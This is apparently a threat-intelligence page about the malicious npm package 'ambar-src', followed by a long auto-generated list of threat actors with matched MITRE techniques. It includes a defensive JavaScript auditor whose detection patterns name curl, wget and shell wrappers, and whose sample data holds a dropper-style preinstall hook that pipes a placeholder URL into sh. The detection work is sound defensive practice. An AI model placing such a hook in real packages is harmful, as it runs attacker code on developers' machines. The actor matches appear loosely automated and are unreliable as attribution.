Trusted Design

New malicious npm package 'ambar-src' targets developers with open source malware

Summary

A malicious npm package named "ambar-src" reached 50,000 downloads in a matter of days before it was removed from the registry. It abuses npm's preinstall script hook, so its malicious code runs during installation without any explicit invocation by the developer, on Windows, Linux, and macOS. The package employs detection-evasion techniques and deploys variants of powerful open-source malware. It fetches additional payloads from remote servers and uses Yandex Cloud for command and control. Affected systems should be considered fully compromised and require immediate incident response. The attack highlights how quickly supply chain risk can propagate and confirms that npm install is a high-risk action.
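The preinstall hook abuse described above is something a defender can audit for before any install script runs. The following is an added example, not code from the pulse or from the ambar-src package; the package names, versions, heuristic patterns and the example.invalid URL are constructed for illustration:

```javascript
// Added example (not code from the pulse or from the ambar-src package):
// audits the npm lifecycle hooks that run automatically during
// `npm install`, the mechanism the pulse describes ambar-src abusing.

// Hooks npm runs for an installed dependency without an explicit call.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Illustrative heuristics for install-time scripts; tune to your environment.
const SUSPICIOUS = [
  { id: "remote-fetch",    re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i },
  { id: "inline-code",     re: /\b(node|python[23]?)\s+-[ec]\b|\beval\b/ },
  { id: "shell-wrapper",   re: /\b(bash|sh|powershell|pwsh|cmd(?:\.exe)?)\s+(?:-c|\/c|-enc|-e)\b/i },
  { id: "encoded-payload", re: /\bbase64\b|[A-Za-z0-9+/]{80,}={0,2}/ },
  { id: "url",             re: /https?:\/\/\S+/i },
];

// Inspect one parsed package.json; returns one finding per install hook present.
function auditPackage(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const reasons = SUSPICIOUS.filter((p) => p.re.test(command)).map((p) => p.id);
    findings.push({ name: pkg.name, version: pkg.version, hook, command, reasons });
  }
  return findings;
}

// Coarse triage: fetching, decoding or spawning a shell at install time is
// what a dropper needs; an ordinary build step (node-gyp etc.) needs none.
function riskOf(finding) {
  const r = finding.reasons;
  if (r.includes("remote-fetch") || r.includes("encoded-payload") || r.includes("shell-wrapper")) return "high";
  if (r.length > 0) return "medium";
  return "low"; // hook exists but looks like an ordinary build step
}

// Audit a whole dependency tree given as parsed package.json objects
// (in practice: every node_modules/**/package.json). Returns findings
// sorted so the highest risk comes first.
function auditTree(packages) {
  const order = { high: 0, medium: 1, low: 2 };
  return packages
    .flatMap(auditPackage)
    .map((f) => ({ ...f, risk: riskOf(f) }))
    .sort((a, b) => order[a.risk] - order[b.risk]);
}

// Constructed sample tree: one benign native module, one package with an
// unremarkable setup step, and one with a dropper-style preinstall hook.
// Names and the URL are placeholders, not the real ambar-src contents.
const SAMPLE_PACKAGES = [
  { name: "native-addon-demo", version: "1.0.0",
    scripts: { install: "node-gyp rebuild", test: "mocha" } },
  { name: "plain-lib-demo", version: "2.3.1",
    scripts: { postinstall: "node scripts/banner.js" } },
  { name: "suspicious-demo", version: "0.0.7",
    scripts: { preinstall: "curl -s https://example.invalid/stage | sh" } },
];

const REPORT = auditTree(SAMPLE_PACKAGES);
for (const f of REPORT) {
  console.log(`[${f.risk.toUpperCase()}] ${f.name}@${f.version} ${f.hook}: ${f.command}` +
    (f.reasons.length ? `  (${f.reasons.join(", ")})` : ""));
}
```

Running `npm install --ignore-scripts` (or setting `ignore-scripts=true` in `.npmrc`) blocks these hooks outright; the audit above is for deciding which packages genuinely need them.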

Created: 2026-02-27

Indicators

Similar Pulses

No similar pulses were found.

Threat actors related to this pulse (fact-based)

Mustang Panda

Score: 59.61
Matched TTPs:
  • T1003 - OS Credential Dumping
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1136.001 - Local Account
  • T1590.006 - Network Security Appliances
  • T1593.002 - Search Engines
  • T1055.013 - Process Doppelgänging
  • T1218.012 - Verclsid
  • T1569.001 - Launchctl
  • T1608 - Stage Capabilities
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1102.003 - One-Way Communication
  • T1169 - Sudo
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1070.009 - Clear Persistence
  • T1159 - Launch Agent
  • T1055.005 - Thread Local Storage
Link to MITRE →

Winnti Group

Score: 3.29
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
Link to MITRE →

APT41

Score: 59.95
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1584.008 - Network Devices
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1562.004 - Disable or Modify System Firewall
  • T1562.012 - Disable or Modify Linux Audit System
  • T1552.004 - Private Keys
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1045 - Software Packing
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
  • T1048 - Exfiltration Over Alternative Protocol
  • T1027 - Obfuscated Files or Information
  • T1573 - Encrypted Channel
  • T1218.010 - Regsvr32
  • T1002 - Data Compressed
  • T1564.003 - Hidden Window
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
  • T1574.002 - DLL Side-Loading
  • T1037.001 - Logon Script (Windows)
Link to MITRE →

Rocke

Score: 29.30
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1497.001 - System Checks
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1552.004 - Private Keys
  • T1059.013 - Container CLI/API
  • T1506 - Web Session Cookie
  • T1027.004 - Compile After Delivery
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

TeamTNT

Score: 42.05
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1606.002 - SAML Tokens
  • T1497.001 - System Checks
  • T1003.007 - Proc Filesystem
  • T1036.009 - Break Process Trees
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1009 - Binary Padding
  • T1562.004 - Disable or Modify System Firewall
  • T1071.003 - Mail Protocols
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1506 - Web Session Cookie
  • T1070.009 - Clear Persistence
  • T1519 - Emond
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

APT28

Score: 41.17
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.004 - Disable or Modify System Firewall
  • T1547.011 - Plist Modification
  • T1608.005 - Link Target
  • T1057 - Process Discovery
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1592.003 - Firmware
  • T1218.010 - Regsvr32
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1588.003 - Code Signing Certificates
  • T1566.003 - Spearphishing via Service
Link to MITRE →

UNC3886

Score: 53.35
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1606.002 - SAML Tokens
  • T1689 - Downgrade Attack
  • T1556.002 - Password Filter DLL
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1021.006 - Windows Remote Management
  • T1090.002 - External Proxy
  • T1136.002 - Domain Account
  • T1588.001 - Malware
  • T1546.003 - Windows Management Instrumentation Event Subscription
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
  • T1546.002 - Screensaver
  • T1070.009 - Clear Persistence
  • T1003.006 - DCSync
Link to MITRE →

Daggerfly

Score: 12.31
Matched TTPs:
  • T1584.008 - Network Devices
  • T1089 - Disabling Security Tools
  • T1573 - Encrypted Channel
  • T1174 - Password Filter DLL
  • T1059.012 - Hypervisor CLI
Link to MITRE →

GALLIUM

Score: 18.17
Matched TTPs:
  • T1584.008 - Network Devices
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1174 - Password Filter DLL
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

APT29

Score: 35.51
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.004 - Disable or Modify System Firewall
  • T1547.011 - Plist Modification
  • T1177 - LSASS Driver
  • T1218.012 - Verclsid
  • T1218.005 - Mshta
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

FIN13

Score: 19.94
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1051 - Shared Webroot
  • T1199 - Trusted Relationship
  • T1569.002 - Service Execution
Link to MITRE →

Dragonfly

Score: 33.18
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1562.004 - Disable or Modify System Firewall
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1657 - Financial Theft
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1573 - Encrypted Channel
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
Link to MITRE →

Ke3chang

Score: 19.16
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1027.008 - Stripped Payloads
  • T1003.007 - Proc Filesystem
  • T1140 - Deobfuscate/Decode Files or Information
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
Link to MITRE →

Agrius

Score: 8.22
Matched TTPs:
  • T1584.008 - Network Devices
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1087.004 - Cloud Account
Link to MITRE →

APT5

Score: 15.88
Matched TTPs:
  • T1584.008 - Network Devices
  • T1027.008 - Stripped Payloads
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1546.003 - Windows Management Instrumentation Event Subscription
  • T1070.009 - Clear Persistence
Link to MITRE →

menuPass

Score: 21.25
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1174 - Password Filter DLL
  • T1070.009 - Clear Persistence
Link to MITRE →

Threat Group-3390

Score: 27.38
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1218.003 - CMSTP
  • T1590.006 - Network Security Appliances
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1573 - Encrypted Channel
  • T1218.010 - Regsvr32
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Wizard Spider

Score: 24.65
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1038 - DLL Search Order Hijacking
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1087.004 - Cloud Account
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
Link to MITRE →

Ember Bear

Score: 31.55
Matched TTPs:
  • T1584.008 - Network Devices
  • T1005 - Data from Local System
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.004 - Disable or Modify System Firewall
  • T1136.002 - Domain Account
  • T1051 - Shared Webroot
  • T1059.001 - PowerShell
  • T1218.010 - Regsvr32
  • T1070.009 - Clear Persistence
  • T1519 - Emond
  • T1003.003 - NTDS
Link to MITRE →

Sea Turtle

Score: 21.81
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1587.003 - Digital Certificates
  • T1063 - Security Software Discovery
  • T1497.001 - System Checks
  • T1140 - Deobfuscate/Decode Files or Information
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API
Link to MITRE →

Axiom

Score: 20.02
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1140 - Deobfuscate/Decode Files or Information
  • T1177 - LSASS Driver
  • T1049 - System Network Connections Discovery
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1160 - Launch Daemon
Link to MITRE →

HEXANE

Score: 22.83
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1065 - Uncommonly Used Port
  • T1601.001 - Patch System Image
  • T1159 - Launch Agent
Link to MITRE →

RedCurl

Score: 18.60
Matched TTPs:
  • T1587.003 - Digital Certificates
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1051 - Shared Webroot
  • T1574.010 - Services File Permissions Weakness
  • T1027.004 - Compile After Delivery
  • T1070.009 - Clear Persistence
Link to MITRE →

APT1

Score: 10.59
Matched TTPs:
  • T1587.003 - Digital Certificates
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
Link to MITRE →

Chimera

Score: 23.06
Matched TTPs:
  • T1587.003 - Digital Certificates
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1592.003 - Firmware
  • T1059.003 - Windows Command Shell
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
Link to MITRE →

Magic Hound

Score: 48.22
Matched TTPs:
  • T1587.003 - Digital Certificates
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1036.009 - Break Process Trees
  • T1070.003 - Clear Command History
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1562.004 - Disable or Modify System Firewall
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1588.001 - Malware
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1683 - Generate Content
  • T1592.003 - Firmware
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1098.002 - Additional Email Delegate Permissions
Link to MITRE →

Winter Vivern

Score: 21.33
Matched TTPs:
  • T1587.003 - Digital Certificates
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.004 - Disable or Modify System Firewall
  • T1055.013 - Process Doppelgänging
  • T1588.001 - Malware
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
Link to MITRE →

Kimsuky

Score: 59.13
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1051 - Shared Webroot
  • T1218.012 - Verclsid
  • T1608 - Stage Capabilities
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1057 - Process Discovery
  • T1055.014 - VDSO Hijacking
  • T1102.003 - One-Way Communication
  • T1199 - Trusted Relationship
  • T1506 - Web Session Cookie
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
  • T1003.003 - NTDS
Link to MITRE →

Moonstone Sleet

Score: 17.34
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1590.006 - Network Security Appliances
  • T1057 - Process Discovery
  • T1027 - Obfuscated Files or Information
  • T1573 - Encrypted Channel
Link to MITRE →

Indrik Spider

Score: 10.27
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1003.007 - Proc Filesystem
  • T1051 - Shared Webroot
  • T1027 - Obfuscated Files or Information
Link to MITRE →

Lazarus Group

Score: 46.47
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1070.008 - Clear Mailbox Data
  • T1009 - Binary Padding
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1057 - Process Discovery
  • T1199 - Trusted Relationship
  • T1174 - Password Filter DLL
  • T1218.010 - Regsvr32
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1055.005 - Thread Local Storage
  • T1569.002 - Service Execution
  • T1216 - System Script Proxy Execution
Link to MITRE →

Contagious Interview

Score: 40.84
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1021.006 - Windows Remote Management
  • T1045 - Software Packing
  • T1016 - System Network Configuration Discovery
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1102.003 - One-Way Communication
  • T1199 - Trusted Relationship
  • T1027.004 - Compile After Delivery
  • T1059.006 - Python
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
  • T1221 - Template Injection
Link to MITRE →

OilRig

Score: 39.28
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1562.009 - Safe Mode Boot
  • T1003.007 - Proc Filesystem
  • T1091 - Replication Through Removable Media
  • T1005 - Data from Local System
  • T1558 - Steal or Forge Kerberos Tickets
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1051 - Shared Webroot
  • T1199 - Trusted Relationship
  • T1048 - Exfiltration Over Alternative Protocol
  • T1218.010 - Regsvr32
  • T1592.002 - Software
  • T1070.009 - Clear Persistence
Link to MITRE →

LuminousMoth

Score: 14.93
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1584.005 - Botnet
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
Link to MITRE →

Sandworm Team

Score: 49.70
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1063 - Security Software Discovery
  • T1566.002 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1005 - Data from Local System
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.004 - Disable or Modify System Firewall
  • T1562.012 - Disable or Modify Linux Audit System
  • T1045 - Software Packing
  • T1049 - System Network Connections Discovery
  • T1087.004 - Cloud Account
  • T1102.003 - One-Way Communication
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1573 - Encrypted Channel
  • T1218.010 - Regsvr32
  • T1075 - Pass the Hash
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
Link to MITRE →

Salt Typhoon

Score: 14.91
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1497.001 - System Checks
  • T1140 - Deobfuscate/Decode Files or Information
  • T1608.002 - Upload Tool
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
Link to MITRE →

Play

Score: 11.03
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1590.006 - Network Security Appliances
  • T1199 - Trusted Relationship
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
Link to MITRE →

Aoqin Dragon

Score: 9.47
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Moses Staff

Score: 8.23
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1199 - Trusted Relationship
Link to MITRE →

Turla

Score: 34.25
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1063 - Security Software Discovery
  • T1003.007 - Proc Filesystem
  • T1684 - Social Engineering
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1218.001 - Compiled HTML File
  • T1506 - Web Session Cookie
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1059.012 - Hypervisor CLI
  • T1569.002 - Service Execution
Link to MITRE →

FIN7

Score: 47.61
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1011.001 - Exfiltration Over Bluetooth
  • T1055.013 - Process Doppelgänging
  • T1588.001 - Malware
  • T1218.012 - Verclsid
  • T1584.005 - Botnet
  • T1608.005 - Link Target
  • T1564.002 - Hidden Users
  • T1057 - Process Discovery
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1573 - Encrypted Channel
  • T1065 - Uncommonly Used Port
  • T1601.001 - Patch System Image
Link to MITRE →

Medusa Group

Score: 29.97
Matched TTPs:
  • T1036.008 - Masquerade File Type
  • T1140 - Deobfuscate/Decode Files or Information
  • T1218.003 - CMSTP
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
  • T1216 - System Script Proxy Execution
Link to MITRE →

Malteiro

Score: 4.74
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1506 - Web Session Cookie
Link to MITRE →

Machete

Score: 8.18
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1027.004 - Compile After Delivery
  • T1059.012 - Hypervisor CLI
Link to MITRE →

Elderwood

Score: 6.10
Matched TTPs:
  • T1087.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Transparent Tribe

Score: 4.05
Matched TTPs:
  • T1087.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
Link to MITRE →

RTM

Score: 4.29
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.012 - Hypervisor CLI
Link to MITRE →

APT-C-36

Score: 3.73
Matched TTPs:
  • T1087.002 - Domain Account
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
Link to MITRE →

CURIUM

Score: 10.61
Matched TTPs:
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
Link to MITRE →

Tropic Trooper

Score: 15.13
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1506 - Web Session Cookie
  • T1070.009 - Clear Persistence
  • T1159 - Launch Agent
Link to MITRE →

Dark Caracal

Score: 8.05
Matched TTPs:
  • T1087.002 - Domain Account
  • T1048 - Exfiltration Over Alternative Protocol
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

PLATINUM

Score: 7.20
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1684 - Social Engineering
  • T1059.012 - Hypervisor CLI
Link to MITRE →

TA551

Score: 7.18
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1218.012 - Verclsid
  • T1601.001 - Patch System Image
Link to MITRE →

FIN8

Score: 13.66
Matched TTPs:
  • T1087.002 - Domain Account
  • T1027.017 - SVG Smuggling
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
Link to MITRE →

BITTER

Score: 10.82
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
Link to MITRE →

APT37

Score: 16.86
Matched TTPs:
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1562.012 - Disable or Modify Linux Audit System
  • T1055.013 - Process Doppelgänging
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
  • T1059.012 - Hypervisor CLI
  • T1216 - System Script Proxy Execution
Link to MITRE →

LazyScripter

Score: 13.62
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1601.001 - Patch System Image
Link to MITRE →

PROMETHIUM

Score: 4.65
Matched TTPs:
  • T1087.002 - Domain Account
  • T1588.001 - Malware
  • T1059.012 - Hypervisor CLI
Link to MITRE →

TA505

Score: 20.19
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1091 - Replication Through Removable Media
  • T1562.012 - Disable or Modify Linux Audit System
  • T1136.002 - Domain Account
  • T1051 - Shared Webroot
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

APT39

Score: 23.41
Matched TTPs:
  • T1087.002 - Domain Account
  • T1499.002 - Service Exhaustion Flood
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.011 - Plist Modification
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1027.004 - Compile After Delivery
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
  • T1569.002 - Service Execution
Link to MITRE →

Star Blizzard

Score: 12.98
Matched TTPs:
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1657 - Financial Theft
  • T1102.003 - One-Way Communication
  • T1199 - Trusted Relationship
Link to MITRE →

Higaisa

Score: 12.48
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1087.004 - Cloud Account
  • T1218.010 - Regsvr32
  • T1569.002 - Service Execution
Link to MITRE →

Rancor

Score: 4.07
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
Link to MITRE →

FIN4

Score: 4.92
Matched TTPs:
  • T1087.002 - Domain Account
  • T1574.010 - Services File Permissions Weakness
Link to MITRE →

Cobalt Group

Score: 17.79
Matched TTPs:
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1518.002 - Backup Software Discovery
  • T1199 - Trusted Relationship
  • T1573 - Encrypted Channel
  • T1218.010 - Regsvr32
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
Link to MITRE →

Storm-1811

Score: 12.44
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1567.003 - Exfiltration to Text Storage Sites
Link to MITRE →

Inception

Score: 10.27
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1218.012 - Verclsid
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1159 - Launch Agent
Link to MITRE →

EXOTIC LILY

Score: 4.25
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1218.010 - Regsvr32
Link to MITRE →

Saint Bear

Score: 10.66
Matched TTPs:
  • T1087.002 - Domain Account
